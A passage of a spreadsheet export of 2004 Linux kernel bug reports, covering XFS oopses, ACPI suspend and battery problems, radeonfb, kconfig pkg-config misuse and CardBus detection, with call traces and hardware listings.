[&lt;0a8c66d9&gt;] xfs_bmapi+0x946/0x104d [xfs] [&lt;0a8f997b&gt;] xfs_trans_read_buf+0x44/0x2d9 [xfs] [&lt;0a8cbe79&gt;] xfs_bmbt_get_state+0xa/0x18 [xfs] [&lt;0a8c4ef4&gt;] xfs_bmap_search_extents+0x3d/0x43 [xfs] [&lt;0a8c60a7&gt;] xfs_bmapi+0x314/0x104d [xfs] [&lt;0a8ea9fe&gt;] xfs_iomap_write_delay+0x54a/0x5b6 [xfs] [&lt;0212c0a1&gt;] mempool_alloc+0x5d/0xf6 [&lt;0a8e9f4c&gt;] xfs_iomap+0x23b/0x3eb [xfs] [&lt;0a8e9ff4&gt;] xfs_iomap+0x2e3/0x3eb [xfs] [&lt;0a90910c&gt;] xfs_bmap+0x1a/0x1e [xfs] [&lt;0a9036f3&gt;] linvfs_get_block_core+0x83/0x234 [xfs] [&lt;021e25f6&gt;] cfq_next_request+0x21/0x37 [&lt;02140f8b&gt;] __wait_on_buffer+0x7d/0x85 [&lt;0a9038b7&gt;] linvfs_get_block+0x13/0x17 [xfs] [&lt;021425a7&gt;] __block_prepare_write+0x146/0x3a5 [&lt;02142e47&gt;] block_prepare_write+0x16/0x22 [&lt;0a9038a4&gt;] linvfs_get_block+0x0/0x17 [xfs] [&lt;0212b79d&gt;] generic_file_aio_write_nolock+0x57e/0x84e [&lt;0a9038a4&gt;] linvfs_get_block+0x0/0x17 [xfs] [&lt;0a8e91d1&gt;] xfs_ichgtime+0xee/0xf6 [xfs] [&lt;0a908e2a&gt;] xfs_write+0x3e5/0x675 [xfs] [&lt;0a9058cf&gt;] linvfs_write+0xa6/0xbc [xfs] [&lt;021400cb&gt;] do_sync_write+0x68/0x9d [&lt;02146f77&gt;] sys_stat64+0x1e/0x23 [&lt;021401b8&gt;] vfs_write+0xb8/0xe4 [&lt;02140252&gt;] sys_write+0x2c/0x42 Code: 89 08 09 fb 31 c9 89 58 04 8b 5a 08 8b 72 0c 8b 52 10 0f a4</t>
  </si>
  <si>
    <t>resuming from s3 affects stability of the interrupts</t>
  </si>
  <si>
    <t>2.6.5-1.358 official fedora kernel</t>
  </si>
  <si>
    <t>2004-06-13 12:09 UTC</t>
  </si>
  <si>
    <t>2004-11-08 13:41 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2 Hardware Environment: IBM T41/R50p Software Environment: FC2 full install Problem Description: After a resume from s3 the system is instable regarding the interrupts. Sometime it looses acpi interrupt, sometime it looses usb interrupt, some other time looses, network interrupt, or sound intterupt. But is not consistent like in http://bugme.osdl.org/show_bug.cgi?id=2643, meaning this is not manifesting the same all the time. Steps to reproduce: echo 3 &gt; /proc/acpi/sleep press power button, resumes ok. ping to my router works fine then after some time (some minutes) i loose etherenet connectivity, and the irq counter from eth0 is not incrementing any more. so after resuming the network is still working but this is only temporary. usualy the acpi interrupt is resumed correctly (increments interrupt count) but from time to time, it is not. Again, I don't know why. I don't remove any modules before suspending. cat /proc/interrupts CPU0 0: 3286226 XT-PIC timer 1: 9072 XT-PIC i8042 2: 0 XT-PIC cascade 3: 0 XT-PIC Intel 82801DB-ICH4 4: 0 XT-PIC uhci_hcd 5: 0 XT-PIC uhci_hcd 8: 1 XT-PIC rtc 9: 499 XT-PIC acpi 10: 169046 XT-PIC uhci_hcd, eth0, radeon@PCI:1:0:0 11: 0 XT-PIC ehci_hcd 12: 180442 XT-PIC i8042 14: 29219 XT-PIC ide0 15: 47 XT-PIC ide1 NMI: 0 ERR: 0</t>
  </si>
  <si>
    <t>/proc/acpi/battery/BAT1 not created on hot-add - IBM T40/T41/R50p</t>
  </si>
  <si>
    <t>2004-06-13 13:00 UTC</t>
  </si>
  <si>
    <t>2008-10-27 19:20 UTC</t>
  </si>
  <si>
    <t>4728 9731</t>
  </si>
  <si>
    <t>Distribution: FC2 Hardware Environment: IBM T40/T41/R50p Software Environment: FC2 full install Problem Description: when hotplug the second battery, /proc/acpi/battery/BAT1 is not created if, the battery is present at boot time, the forementioned directory is created, and everything is fine if later on I pull/plug the battery. Steps to reproduce: boot without second battery. put second battery in bay. /proc/acpi/battery/BAT1 is not created, but the battery is active because the first battery is not discharging anymore. boot with second battery in bay. /proc/acpi/battery/BAT1 is created, battery is present, everything is fine if I plug/unplug whatever battery I want. With previous kernels, like 2.6.3 or something, the /proc/acpi/battery/BAT1 directory was created at boot time, even if there was not the second battery iserted. So it was not like this all the time, something changed recently in battery code.</t>
  </si>
  <si>
    <t>Could not suspend device 0000:00:1d.7: error -5</t>
  </si>
  <si>
    <t>2004-06-14 09:53 UTC</t>
  </si>
  <si>
    <t>2005-01-23 14:43 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2 Hardware Environment: IBM T41/R50p Software Environment: FC2 full install Problem Description: I try to put the laptop in s3 and I got the error: PCI: Setting latency timer of device 0000:00:1d.7 to 64 Could not suspend device 0000:00:1d.7: error -5 Steps to reproduce: echo 3 &gt; /proc/acpi/sleep and I get that message in dmesg. the 0000:00:1d.7 is my USB2.0 builtin controller. if I rmmod ehci_hcd, the laptop suspends OK. I did not experieced this error with older kernels till 2.6.5, then I upgraded to 2.6.7-rc3 and I get this error. here is the lspci -vv of the usb2 controller: 00:1d.7 USB Controller: Intel Corp. 82801DB (ICH4) USB2 EHCI Controller (rev 01) (prog-if 20 [EHCI]) Subsystem: IBM: Unknown device 052e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 11 Region 0: Memory at c0000000 (32-bit, non-prefetchable) Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #0a [2080]</t>
  </si>
  <si>
    <t>Bug in fs/sysfs/file.c causes hald (Project Utopia) to crash when wlan adapter (driver: ipw2100) turned off</t>
  </si>
  <si>
    <t>2004-06-16 06:52 UTC</t>
  </si>
  <si>
    <t>Michael Biebl</t>
  </si>
  <si>
    <t>2004-11-30 15:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: HP nx7000 Notebook, wLan: Intel</t>
  </si>
  <si>
    <t>screen become blank when loading radeonfb during kernel 2.6.7 loading at boot time</t>
  </si>
  <si>
    <t>2004-06-16 13:15 UTC</t>
  </si>
  <si>
    <t>Marcello Greco</t>
  </si>
  <si>
    <t>2005-08-15 17:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 upgraded to Current Hardware Environment: Epox EP-8k9a2+, Athlon XP2700+, 256 Mb DDR Corsair PC2700, ATI Radeon 9500, Adaptec 19160 SCSI Controller, Quantum Atlas 10K3 18Gb, Maxtor 6Y080L0 80Gb, Samsung SV2042H 20Gb, Pinnacle PCTV, YAMAHA CRW-F1S, LiteOn LDW-811S, JLMS XJ-HD166S Software Environment: all software included in Slackware 9.1 upgraded to the slackware-current, so, for example, gcc 3.3.4, kde 3.2.3... I upgraded my slackware today with success using swaret with ftp.nluug.nl Problem Description: In the kernel configuration I set the "Support for frame buffer devices" and "ATI Radeon display support" and "DDC/I2C for ATI Radeon support". When I boot the machine, at the moment in which radeonfb is loaded screen become blank, all white writings disappear, kernel loading proceed but the only visible activity on the screen in the blanking underscore. I accessed the machine using ssh from network and all is ok, but the screen in blank. If I remove "Support for frame buffer devices", "ATI Radeon display support" and "DDC/I2C for ATI Radeon support" from kernel configuration and reboot the machine, the system boot-up without problems and the screen continues to be visible. I used kernel 2.6.6 since some hours ago, i had "Support for frame buffer devices", "ATI Radeon display support" and "DDC/I2C for ATI Radeon support" set in the configuration but this problem is there only with new 2.6.7 kernel version. Steps to reproduce: Compile kernel 2.6.7 with "Support for frame buffer devices", "ATI Radeon display support" and "DDC/I2C for ATI Radeon support", install just-compiled kernel (copy bzImage to /boot and run lilo) and reboot the machine. I believe this problem only occurs on machines with a mine-like hardware (primarily graphic card and maybe motherboard or type of chipset KT400) .</t>
  </si>
  <si>
    <t>stack consumption audit</t>
  </si>
  <si>
    <t>2004-06-16 19:08 UTC</t>
  </si>
  <si>
    <t>2005-08-18 08:20 UTC</t>
  </si>
  <si>
    <t>Need compat ioctl handlers for parport</t>
  </si>
  <si>
    <t>2004-06-17 06:15 UTC</t>
  </si>
  <si>
    <t>2005-12-12 19:22 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES9 (suse kotd from 20040615) Hardware Environment: Opteron 240 running vmware 4.5.2 with a parport on 64 bit SLES9, vmware complains that it cannot exclusively use parport0. Syslog says: Jun 17 15:04:27 opi kernel: ioctl32(vmware-vmx:31305): Unknown cmd fd(25) cmd(0000708f){00} arg(00000000) on /dev/parport0</t>
  </si>
  <si>
    <t>Hadmut Danisch</t>
  </si>
  <si>
    <t>Invalid usage of pkg-config (gconfig related)</t>
  </si>
  <si>
    <t>2004-06-18 18:54 UTC</t>
  </si>
  <si>
    <t>Jens Elkner</t>
  </si>
  <si>
    <t>2006-01-13 03:31 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware Hardware Environment: x86 Software Environment: POSIXLY_CORRECT=1; PKG_CONFIG_PATH=/opt/gnome2/lib/pkgconfig Problem Description: make gconfig If the environment variable POSIXLY_CORRECT is set, make gconfig produces * * Unable to find the GTK+ installation. Please make sure that * the GTK+ 2.0 development package is correctly installed... * You need gtk+-2.0, glib-2.0 and libglade-2.0. * make[1]: *** [scripts/kconfig/.tmp_gtkcheck] Error 1 make: *** [gconfig] Error 2 The problem is, that pkg-config in scripts/kconfig/Makefile in not used in the correct way - options are given after command arguments: HOSTLOADLIBES_gconf = `pkg-config gtk+-2.0 gmodule-2.0 libglade-2.0 --libs` HOSTCFLAGS_gconf.o = `pkg-config gtk+-2.0 gmodule-2.0 libglade-2.0 --cflags` To fix this, one should use the following lines instead: HOSTLOADLIBES_gconf = `pkg-config --libs gtk+-2.0 gmodule-2.0 libglade-2.0` HOSTCFLAGS_gconf.o = `pkg-config --cflags gtk+-2.0 gmodule-2.0 libglade-2.0` Steps to reproduce: Set the env variable POSIXLY_CORRECT=1 and try make gconfig.</t>
  </si>
  <si>
    <t>Nforce Ethernet doesn't work</t>
  </si>
  <si>
    <t>2004-06-19 04:19 UTC</t>
  </si>
  <si>
    <t>Jan Boeschow</t>
  </si>
  <si>
    <t>2007-09-01 09:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Athlon XP 2500+, NForce2 Software Environment: Problem Description: NForce Ethernet Adapter doesn't get an IP over DHCP on Kernel 2.6.7. Worked on 2.6.6 Steps to reproduce: Compile NForce Ethernet into kernel.</t>
  </si>
  <si>
    <t>kernel 2.6.7 - computer locks at boot with ACPI</t>
  </si>
  <si>
    <t>2004-06-19 09:28 UTC</t>
  </si>
  <si>
    <t>Petr Balas</t>
  </si>
  <si>
    <t>Distribution: vanilla kernel 2.6.7 (Debian unstable) Hardware Environment: Intel 865GBFL Software Environment: vanilla kernel 2.6.7, gcc version 3.3.4 (Debian) Problem Description: computer locks at boot, acpi=off solves problem, kernel 2.6.6 (vanilla, same config) work OK Last message on screen (two different cases): 1) ACPI namespace successfully loaded at ... 2) ACPI namespace successfully loaded at root c063c6bc Unable to handle kernel paging request&lt;1&gt;Unable to handle kernel paging reguest at virtual address 6cb1e57c bad: scheduling while atomic [&lt;c046e161&gt;] at virtual address fffdf000 printing eip: 56575550 *pde= 00004067 *pte= 00000000 .... Steps to reproduce: boot computer</t>
  </si>
  <si>
    <t>NLS support for ASCII</t>
  </si>
  <si>
    <t>2004-06-19 12:23 UTC</t>
  </si>
  <si>
    <t>2004-07-09 18:41 UTC</t>
  </si>
  <si>
    <t>there is no NLS module for ASCII. If a NLS_DEFAULT ist set it it impossible to disable any conversion of non-ASCII characters in filesystems like vfat etc. I attached a patch which adds an ascii nls module. It is manually created based on the iso8859-1 nls module.</t>
  </si>
  <si>
    <t>nfsd: page allocation failure.</t>
  </si>
  <si>
    <t>2004-06-21 04:41 UTC</t>
  </si>
  <si>
    <t>2004-06-21 21:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Whitebox linux 3.0 Hardware Environment: IBM xseries 330, dual cpu Pentium III, 2 GB memory, qla2300 FC-HBA. Software Environment: Mainly a NFS-server. All software is up2date standard installation from the Whitebox-distribution, except the addition of XFS bits and 2.6.7-rc3 kernel. I was running with nfs-utils-1.0.6-21EL when the oops happened. Afterwards I upgraded to kernel 2.6.7, and nfs-utils-1.0.6-7.EL and mounted /proc/fs/nfsd and /var/lib/nfs/rpc_pipefs. Problem Description: I got this in my kernel log while downloading 3 600MB iso-images on a NFS-client: nfsd: page allocation failure. order:4, mode:0x50 [&lt;c0139b91&gt;] __alloc_pages+0x2f1/0x350 [&lt;c0139c0f&gt;] __get_free_pages+0x1f/0x40 [&lt;c013d08e&gt;] kmem_getpages+0x1e/0xd0 [&lt;c013dc91&gt;] cache_grow+0x91/0x1f0 [&lt;c013deb5&gt;] cache_alloc_refill+0xc5/0x220 [&lt;c013e4f1&gt;] __kmalloc+0x71/0x90 [&lt;c02292bc&gt;] xfs_iext_realloc+0x13c/0x240 [&lt;c01fed1a&gt;] xfs_bmap_insert_exlist+0x2a/0xc0 [&lt;c01fb91c&gt;] xfs_bmap_add_extent_hole_delay+0x31c/0x510 [&lt;c0135ec9&gt;] find_lock_page+0x29/0xa0 [&lt;c01f91d7&gt;] xfs_bmap_add_extent+0x3d7/0x490 [&lt;c0201866&gt;] xfs_bmapi+0x1136/0x15f0 [&lt;c023fbc9&gt;] xfs_trans_log_buf+0x69/0xa0 [&lt;c02009f7&gt;] xfs_bmapi+0x2c7/0x15f0 [&lt;c01066c4&gt;] common_interrupt+0x18/0x20 [&lt;c020381d&gt;] xfs_bmap_eof+0x7d/0xb0 [&lt;c022c6e6&gt;] xfs_iomap_write_delay+0x4c6/0x680 [&lt;c023f0f0&gt;] xfs_trans_unlocked_item+0x30/0x50 [&lt;c022b68e&gt;] xfs_imap_to_bmap+0x2e/0x290 [&lt;c022bbea&gt;] xfs_iomap+0x2fa/0x4b0 [&lt;c024c02f&gt;] linvfs_get_block_core+0x8f/0x2e0 [&lt;c02252c7&gt;] xfs_ilock+0x57/0x100 [&lt;c024c2b3&gt;] linvfs_get_block+0x33/0x40 [&lt;c0156304&gt;] __block_prepare_write+0x1f4/0x410 [&lt;c0139b9e&gt;] __alloc_pages+0x2fe/0x350 [&lt;c0135a4e&gt;] add_to_page_cache+0x4e/0xc0 [&lt;c0156c88&gt;] block_prepare_write+0x28/0x50 [&lt;c024c280&gt;] linvfs_get_block+0x0/0x40 [&lt;c01377a4&gt;] generic_file_aio_write_nolock+0x354/0x970 [&lt;c024c280&gt;] linvfs_get_block+0x0/0x40 [&lt;c022ab2c&gt;] xfs_ichgtime+0xfc/0xfe [&lt;c0252f6a&gt;] xfs_write+0x26a/0x7a0 [&lt;c035dbe7&gt;] sock_alloc_send_pskb+0xc7/0x1e0 [&lt;c02a2e9b&gt;] as_add_request+0x16b/0x1c0 [&lt;c024f091&gt;] linvfs_writev+0xc1/0x140 [&lt;c036f320&gt;] pfifo_fast_enqueue+0x0/0x80 [&lt;c036321f&gt;] dev_queue_xmit+0x20f/0x280 [&lt;c037fcd0&gt;] ip_finish_output2+0x0/0x18a [&lt;c037fd71&gt;] ip_finish_output2+0xa1/0x18a [&lt;c024efd0&gt;] linvfs_writev+0x0/0x140 [&lt;c01534ed&gt;] do_readv_writev+0x14d/0x230 [&lt;c0152fe0&gt;] do_sync_write+0x0/0xb0 [&lt;c024f31a&gt;] linvfs_open+0x6a/0x70 [&lt;c0153db9&gt;] open_private_file+0x89/0x90 [&lt;c01536a1&gt;] vfs_writev+0x61/0x70 [&lt;c01cb4e5&gt;] nfsd_write+0xf5/0x320 [&lt;c0117ab0&gt;] recalc_task_prio+0x80/0x160 [&lt;c01d2388&gt;] nfsd3_proc_write+0xb8/0x120 [&lt;c01d3ed0&gt;] nfs3svc_decode_writeargs+0x0/0x160 [&lt;c01c77de&gt;] nfsd_dispatch+0xbe/0x19c [&lt;c03c9e02&gt;] svc_process+0x4d2/0x5f9 [&lt;c0119de0&gt;] default_wake_function+0x0/0x10 [&lt;c01c7590&gt;] nfsd+0x1b0/0x340 [&lt;c01c73e0&gt;] nfsd+0x0/0x340 [&lt;c0103fad&gt;] kernel_thread_helper+0x5/0x18 Unable to handle kernel paging request at virtual address 00008000 printing eip: c02089ff *pde = 00000000 Oops: 0002 [#1] SMP Modules linked in: ipv6 lp ipt_REJECT ipt_state ip_conntrack iptable_filter ip_tables ohci_hcd CPU: 0 EIP: 0060:[&lt;c02089ff&gt;] Not tainted EFLAGS: 00010206 (2.6.7-rc3-ql) EIP is at xfs_bmbt_set_all+0x2f/0x60 eax: 00008000 ebx: 00000000 ecx: 006d2dff edx: f74da850 esi: 000001ff edi: 00000000 ebp: 00000001 esp: f74da610 ds: 007b es: 007b ss: 0068 Process nfsd (pid: 2780, threadinfo=f74da000 task=c22b9750) Stack: f74da86c 00000001 00008000 c01fed8c 00000000 00000001 00000800 00000800 00000000 00000010 00000800 c01fb91c f74da850 00000000 f7017690 01828298 f7017694 c0135ec9 00000000 c4948bc0 00000050 00000000 00000000 00000000 Call Trace: [&lt;c01fed8c&gt;] xfs_bmap_insert_exlist+0x9c/0xc0 [&lt;c01fb91c&gt;] xfs_bmap_add_extent_hole_delay+0x31c/0x510 [&lt;c0135ec9&gt;] find_lock_page+0x29/0xa0 [&lt;c01f91d7&gt;] xfs_bmap_add_extent+0x3d7/0x490 [&lt;c0201866&gt;] xfs_bmapi+0x1136/0x15f0 [&lt;c023fbc9&gt;] xfs_trans_log_buf+0x69/0xa0 [&lt;c02009f7&gt;] xfs_bmapi+0x2c7/0x15f0 [&lt;c01066c4&gt;] common_interrupt+0x18/0x20 [&lt;c020381d&gt;] xfs_bmap_eof+0x7d/0xb0 [&lt;c022c6e6&gt;] xfs_iomap_write_delay+0x4c6/0x680 [&lt;c023f0f0&gt;] xfs_trans_unlocked_item+0x30/0x50 [&lt;c022b68e&gt;] xfs_imap_to_bmap+0x2e/0x290 [&lt;c022bbea&gt;] xfs_iomap+0x2fa/0x4b0 [&lt;c024c02f&gt;] linvfs_get_block_core+0x8f/0x2e0 [&lt;c02252c7&gt;] xfs_ilock+0x57/0x100 [&lt;c024c2b3&gt;] linvfs_get_block+0x33/0x40 [&lt;c0156304&gt;] __block_prepare_write+0x1f4/0x410 [&lt;c0139b9e&gt;] __alloc_pages+0x2fe/0x350 [&lt;c0135a4e&gt;] add_to_page_cache+0x4e/0xc0 [&lt;c0156c88&gt;] block_prepare_write+0x28/0x50 [&lt;c024c280&gt;] linvfs_get_block+0x0/0x40 [&lt;c01377a4&gt;] generic_file_aio_write_nolock+0x354/0x970 [&lt;c024c280&gt;] linvfs_get_block+0x0/0x40 [&lt;c022ab2c&gt;] xfs_ichgtime+0xfc/0xfe [&lt;c0252f6a&gt;] xfs_write+0x26a/0x7a0 [&lt;c035dbe7&gt;] sock_alloc_send_pskb+0xc7/0x1e0 [&lt;c02a2e9b&gt;] as_add_request+0x16b/0x1c0 [&lt;c024f091&gt;] linvfs_writev+0xc1/0x140 [&lt;c036f320&gt;] pfifo_fast_enqueue+0x0/0x80 [&lt;c036321f&gt;] dev_queue_xmit+0x20f/0x280 [&lt;c037fcd0&gt;] ip_finish_output2+0x0/0x18a [&lt;c037fd71&gt;] ip_finish_output2+0xa1/0x18a [&lt;c024efd0&gt;] linvfs_writev+0x0/0x140 [&lt;c01534ed&gt;] do_readv_writev+0x14d/0x230 [&lt;c0152fe0&gt;] do_sync_write+0x0/0xb0 [&lt;c024f31a&gt;] linvfs_open+0x6a/0x70 [&lt;c0153db9&gt;] open_private_file+0x89/0x90 [&lt;c01536a1&gt;] vfs_writev+0x61/0x70 [&lt;c01cb4e5&gt;] nfsd_write+0xf5/0x320 [&lt;c0117ab0&gt;] recalc_task_prio+0x80/0x160 [&lt;c01d2388&gt;] nfsd3_proc_write+0xb8/0x120 [&lt;c01d3ed0&gt;] nfs3svc_decode_writeargs+0x0/0x160 [&lt;c01c77de&gt;] nfsd_dispatch+0xbe/0x19c [&lt;c03c9e02&gt;] svc_process+0x4d2/0x5f9 [&lt;c0119de0&gt;] default_wake_function+0x0/0x10 [&lt;c01c7590&gt;] nfsd+0x1b0/0x340 [&lt;c01c73e0&gt;] nfsd+0x0/0x340 [&lt;c0103fad&gt;] kernel_thread_helper+0x5/0x18 Code: 89 08 09 fb 31 c9 89 58 04 8b 5a 08 8b 72 0c 8b 52 10 0f a4 Steps to reproduce:</t>
  </si>
  <si>
    <t>system hang while using Mozilla Firefox 0.8</t>
  </si>
  <si>
    <t>2004-06-22 14:03 UTC</t>
  </si>
  <si>
    <t>Yu Wang</t>
  </si>
  <si>
    <t>2004-07-18 14:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Acer Travelmate 332t Laptop Pentium II 366MHz 192MB RAM PCMCIA Cardbus Software Environment: GNOME 2.6 Mozilla Firefox 0.8 Problem Description: Under non-root account, after few minutes browsing websites with rich contents, system hang. The problem remains until I disabled MTRR Support in kernel configuration, since I found the following message in /var/log/kern.log: "mtrr: 0x80800000,0x200000 overlaps existing 0x80800000,0x100000" But the system goes slow after MTRR is disabled. Steps to reproduce: Keep surfing the internet.</t>
  </si>
  <si>
    <t>oops at pcmcia card removal</t>
  </si>
  <si>
    <t>2.6.7-bk3</t>
  </si>
  <si>
    <t>2004-06-23 05:43 UTC</t>
  </si>
  <si>
    <t>2004-08-08 14:53 UTC</t>
  </si>
  <si>
    <t>Distribution: debian testing/unstable Hardware Environment: IBM ThinkPad R40 (2722-B3G) Software Environment: linux 2.6.7-bk4, cardmgr version 3.2.5 Problem Description: oops at pcmcia card removal Steps to reproduce: plug in pcmcia card, plug out pcmcia card I've had this with a WLAN adapter (Avaya ORiNOCO Gold), and also with a CompactFlash card in a PCMCIA Adapter.</t>
  </si>
  <si>
    <t>Boot crash w/ CONFIG_SCHED_SMT - Intel P865PERL</t>
  </si>
  <si>
    <t>2.6.5-mm1, 2.6.7, 2.6.7-mm1</t>
  </si>
  <si>
    <t>2004-06-23 08:19 UTC</t>
  </si>
  <si>
    <t>Alexander Weber</t>
  </si>
  <si>
    <t>2004-11-03 17:51 UTC</t>
  </si>
  <si>
    <t>1908 2785 2963 3040 3102</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: MB: Intel P865 PERL - Bios: RL86510A.86A.P17 (latest version) CPU: vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 3.00GHz stepping : 9 flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid RAM: 2 GB Infinion DDR400 Software Environment: Kernel version 2.6.5 or above... Problem Description: Kernel oops when trying to start ACPI - most of the time, different messages, mainly (from a 2.6.7-mm1 kernel): "Unable to handle kernel NULL pointer dereference at virtual address XXXXXXX printing eip: YYYYYYYY with XXXXXXXX usally 00000000 or 00000002, 0000000c, ... and YYYYYYYY seen with f7fa0578 (XXXXXXXX was 00000002 with this), or 00000000 ACPI Subsytem Revision 20040326 One time seen: __wake_up_common+0x35/0x55 __wake_up_coded+0x1f/0x23 __down_trylock+0x78/0x8e __down_failed_trylock+0x7/0xc .text.lock.osl+0x5/0x32 acpi_ut_acquire_mutex+0x5d/0x70 acpi_get_register+0x32/0x72 acpi_hw_get_mode+0x24/0x3c acpi_hw_set_mode+0xca/0x107 acpi_enable+0x25/0x4e acpi_enable_subsystem+0x27/0x45 acpi_bus_init+0xa2/0x11d acpi_init+0x5e/0xd8 do_initcalls+0x28/0xae init+0x92/0x1d9 init+0x0/0x1d9 kernel_thread_helper+0x5/0xb code: Bad EIP value &lt;0&gt; Kernel panic: Attempted to kill init Errors seen with kernel 2.6.5-mm6: ACPI-0183: *** ERROR: Hardware never changed modes ACPI-0089: *** ERROR: Could not transition to APCI mode No ACPI aswell with vanilla 2.6.7. no Problems with kernel 2.6.4-mm1! Steps to reproduce: Compile kernel with version =&gt; 2.6.5 and try to boot with acpi. /proc/acpi/info from a running 2.4.25-gentoo-r2 kernel: version: 20040116 states: S0 S1 S3 S4 S5 Any help appreciated... regards, Alex :)</t>
  </si>
  <si>
    <t>Steffen Schwientek</t>
  </si>
  <si>
    <t>No Cardbus cards shown by lspci</t>
  </si>
  <si>
    <t>2004-06-23 19:06 UTC</t>
  </si>
  <si>
    <t>Clark Tompsett</t>
  </si>
  <si>
    <t>2007-05-02 07:48 UTC</t>
  </si>
  <si>
    <t>Bernhard Kaindl</t>
  </si>
  <si>
    <t>Distribution: Suse 9.1 32/64 bit kernel 2.6.7 (also reported with Debian and Slackware) Hardware Environment: Compaq R3140us and all Compaq R3000 series laptops with the ti1620 controler Software Environment: Problem Description: Cardbus cards not seen when inserted in Compaq R3000 series laptop with ti1620 cardbus controler. Steps to reproduce: 1) load linux 2) modify /etc/pcmcia/config.opt to have (for the ports and memory used by the controler)- include port 0x3000-0x3fff exclude memory 0xe8200000-0xe85fffff exclude memory 0xe9000000-0xe93fffff exclude port 0x4000-0x40ff # PCI CardBus #03 exclude port 0x4400-0x44ff # PCI CardBus #03 exclude port 0x5000-0x5fff # PCI CardBus #07 exclude port 0x6000-0x6fff # PCI CardBus #07 exclude port 0x7000-0x70ff # 0000:02:01.0 exclude port 0x7400-0x743f # 0000:02:04.2 (the cardbus controler is seen through a pci bridge from the main bus) 3) start pcmcia services 4) insert cardbus card. Card not seen. I have a belkin 2.0 usb cardbus and it is not seen or setup. lspci-vt-- -[00]-+-00.0 nVidia Corporation nForce3 Host Bridge +-01.0 nVidia Corporation nForce3 LPC Bridge +-01.1 nVidia Corporation nForce3 SMBus +-02.0 nVidia Corporation nForce3 USB 1.1 +-02.1 nVidia Corporation nForce3 USB 1.1 +-02.2 nVidia Corporation nForce3 USB 2.0 +-06.0 nVidia Corporation nForce3 Audio +-06.1 nVidia Corporation: Unknown device 00d9 +-08.0 nVidia Corporation nForce3 IDE +-0a.0-[02]--+-01.0 Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ | +-02.0 Broadcom Corporation BCM94306 802.11g | +-04.0 Texas Instruments: Unknown device ac54 | +-04.1 Texas Instruments: Unknown device ac54 | \-04.2 Texas Instruments: Unknown device 8201 +-0b.0-[01]----00.0 nVidia Corporation NV17 [GeForce4 420 Go 32M] +-18.0 Advanced Micro Devices [AMD] K8 NorthBridge +-18.1 Advanced Micro Devices [AMD] K8 NorthBridge +-18.2 Advanced Micro Devices [AMD] K8 NorthBridge \-18.3 Advanced Micro Devices [AMD] K8 NorthBridge (Belkin card is in at the time the lspci was taken) There is no indication of the card. This problem also affect wireless cards. /proc/memio: # cat /proc/iomem 00000000-0009f7ff : System RAM 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cfbff : Video ROM 000d4000-000d4fff : Adapter ROM 000f0000-000fffff : System ROM 00100000-1ff6ffff : System RAM 00100000-002fc5fd : Kernel code 002fc5fe-003b8dff : Kernel data 1ff70000-1ff7efff : ACPI Tables 1ff7f000-1ff7ffff : ACPI Non-volatile Storage 1ff80000-1fffffff : reserved e8000000-e8000fff : 0000:00:02.0 e8000000-e8000fff : ohci_hcd e8001000-e8001fff : 0000:00:02.1 e8001000-e8001fff : ohci_hcd e8002000-e8002fff : 0000:00:06.0 e8002000-e80021ff : NVidia nForce3 - AC'97 e8003000-e8003fff : 0000:00:06.1 e8004000-e80040ff : 0000:00:02.2 e8004000-e80040ff : ehci_hcd e8100000-e97fffff : PCI Bus #02 e8100000-e8101fff : 0000:02:02.0 e8100000-e8101fff : bcmwl5.sys e8102000-e8102fff : 0000:02:04.0 e8102000-e8102fff : yenta_socket e8103000-e8103fff : 0000:02:04.1 e8103000-e8103fff : yenta_socket e8104000-e81040ff : 0000:02:01.0 e8104000-e81040ff : 8139too e8200000-e83fffff : PCI CardBus #03 e8400000-e85fffff : PCI CardBus #03 e8c00000-e8ffffff : PCI CardBus #07 e9000000-e93fffff : PCI CardBus #07 e9400000-e9400fff : card services ea000000-eaffffff : PCI Bus #01 ea000000-eaffffff : 0000:01:00.0 f0000000-f7ffffff : 0000:00:00.0 f0000000-f7ffffff : aperture f8000000-fc0fffff : PCI Bus #01 f8000000-fbffffff : 0000:01:00.0 fc000000-fc07ffff : 0000:01:00.0 fff80000-ffffffff : reserved</t>
  </si>
  <si>
    <t>security/selinux/hooks.c:4206: error: `selinux_netlink_send' undeclared here (not in a function)</t>
  </si>
  <si>
    <t>2.6.7-mm2</t>
  </si>
  <si>
    <t>2004-06-24 04:37 UTC</t>
  </si>
  <si>
    <t>2004-07-09 19:31 UTC</t>
  </si>
  <si>
    <t>After mount/umount, cdrom won't eject or be opened by button</t>
  </si>
  <si>
    <t>all known 2.6.X, 2.4.X... - 2.6.22.6</t>
  </si>
  <si>
    <t>2004-06-25 05:20 UTC</t>
  </si>
  <si>
    <t>Cijoml Cijomlovic Cijomlov</t>
  </si>
  <si>
    <t>2008-09-22 13:00 UTC</t>
  </si>
  <si>
    <t>Borislav Petkov</t>
  </si>
  <si>
